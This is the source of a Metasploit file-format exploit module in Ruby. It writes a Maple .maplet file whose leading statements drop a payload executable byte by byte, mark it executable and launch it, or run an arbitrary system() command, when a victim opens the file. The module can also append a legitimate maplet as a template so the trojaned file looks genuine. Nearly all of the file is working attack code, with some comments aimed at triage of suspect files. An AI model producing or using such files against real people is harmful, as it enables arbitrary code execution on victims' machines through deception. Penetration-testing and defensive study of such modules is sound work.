Path: blob/master/modules/exploits/multi/fileformat/maple_maplet.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# File-format module that writes a Maple .maplet file whose leading
# statements run when the file is opened in Maple (OSVDB 64541).
#
# Shape of the generated file, for triage of a suspect .maplet. The injected
# statements always come first; any TEMPLATE content is appended after them.
#   * Binary targets: `<var> := fopen("<name>",WRITE,BINARY);`, then one or
#     more `writebytes(<var>,[...]);` calls carrying at most 100 integer byte
#     values each, `fclose(<var>);`, a `system("chmod a+x <name>");` line on
#     non-Windows targets, and finally `system[launch]("<name>");`.
#   * 'Universal CMD' target: a single `system("...");` statement.
# <var> and <name> are 3 to 17 characters produced by rand_text_alpha
# (presumably letters only; confirm against the framework helper). <name>
# carries no directory component and gets an ".exe" suffix on Windows targets.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  # Registers the module metadata, the five targets and the two file options.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    module_info = {
      'Name' => 'Maple Maplet File Creation and Command Execution',
      'Description' => %q{
        This module harnesses Maple's ability to create files and execute commands
        automatically when opening a Maplet. All versions up to 13 are suspected
        vulnerable. Testing was conducted with version 13 on Windows. Standard security
        settings prevent code from running in a normal maple worksheet without user
        interaction, but those setting do not prevent code in a Maplet from running.

        In order for the payload to be executed, an attacker must convince someone to
        open a specially modified .maplet file with Maple. By doing so, an attacker can
        execute arbitrary code as the victim user.
      },
      'License' => MSF_LICENSE,
      'Author' => ['scriptjunkie'],
      'References' => [
        ['OSVDB', '64541'],
        ['URL', 'http://www.maplesoft.com/products/maple/']
      ],
      'Payload' => {
        'Space' => 1024,
        'BadChars' => '',
        'DisableNops' => true,
        # 'Compat' =>
        #   {
        #     'PayloadType' => 'cmd',
        #     'RequiredCmd' => 'generic perl telnet',
        #   }
      },
      'Platform' => %w[win linux unix],
      'Targets' => [
        ['Windows', { 'Arch' => ARCH_X86, 'Platform' => 'win' }],
        ['Windows X64', { 'Arch' => ARCH_X64, 'Platform' => 'win' }],
        ['Linux', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }],
        ['Linux X64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' }],
        ['Universal CMD', { 'Arch' => ARCH_CMD, 'Platform' => %w[linux unix win] }]
      ],
      'DisclosureDate' => '2010-04-26',
      'DefaultTarget' => 0
    }
    super(update_info(info, module_info))

    register_options(
      [
        OptString.new('TEMPLATE', [false, 'The file to infect.', '']),
        OptString.new('FILENAME', [true, 'The output file.', 'msf.maplet'])
      ]
    )
  end

  # Assembles the maplet text and hands it to file_create.
  #
  # The injected statements are placed first; when TEMPLATE is not the empty
  # string, the raw bytes of that file are appended after them.
  def exploit
    content =
      if target['Arch'] == ARCH_CMD
        # Command targets need no dropped file: the encoded payload is the
        # argument of one system() statement.
        "system(\"#{payload.encoded}\");\n"
      else
        maplet_dropper_statements
      end

    # Original maplet body, if any, follows the injected statements.
    template_path = datastore['TEMPLATE']
    unless template_path == ''
      File.open(template_path, 'rb') do |io|
        content << io.read(File.size(template_path))
      end
    end

    print_status("Creating '#{datastore['FILENAME']}' file...")
    file_create(content)
  end

  private

  # Maple statements that write the payload executable to a randomly named
  # file and launch it.
  #
  # @return [String] the fopen / writebytes / fclose / system statements
  def maplet_dropper_statements
    # Payload as an executable for the selected target.
    binary = generate_payload_exe

    # Random on-disk name, then a random Maple variable for the file handle.
    drop_name = rand_text_alpha(3 + rand(15))
    drop_name << '.exe' if target['Platform'] == 'win'
    handle_var = rand_text_alpha(3 + rand(15))

    script = handle_var + " := fopen(\"#{drop_name}\",WRITE,BINARY);\n"

    # One writebytes() call per 100 byte values; an empty payload still
    # yields a single call with an empty list.
    batches = binary.unpack('C*').each_slice(100).to_a
    batches << [] if batches.empty?
    batches.each do |batch|
      script << "writebytes(#{handle_var},[#{batch.join(',')}]);\r\n"
    end

    script << "fclose(#{handle_var});\n"
    # The dropped file is marked executable everywhere except Windows.
    script << "system(\"chmod a+x #{drop_name}\");\n" unless target['Platform'] == 'win'
    script << "system[launch](\"#{drop_name}\");\n"
  end
end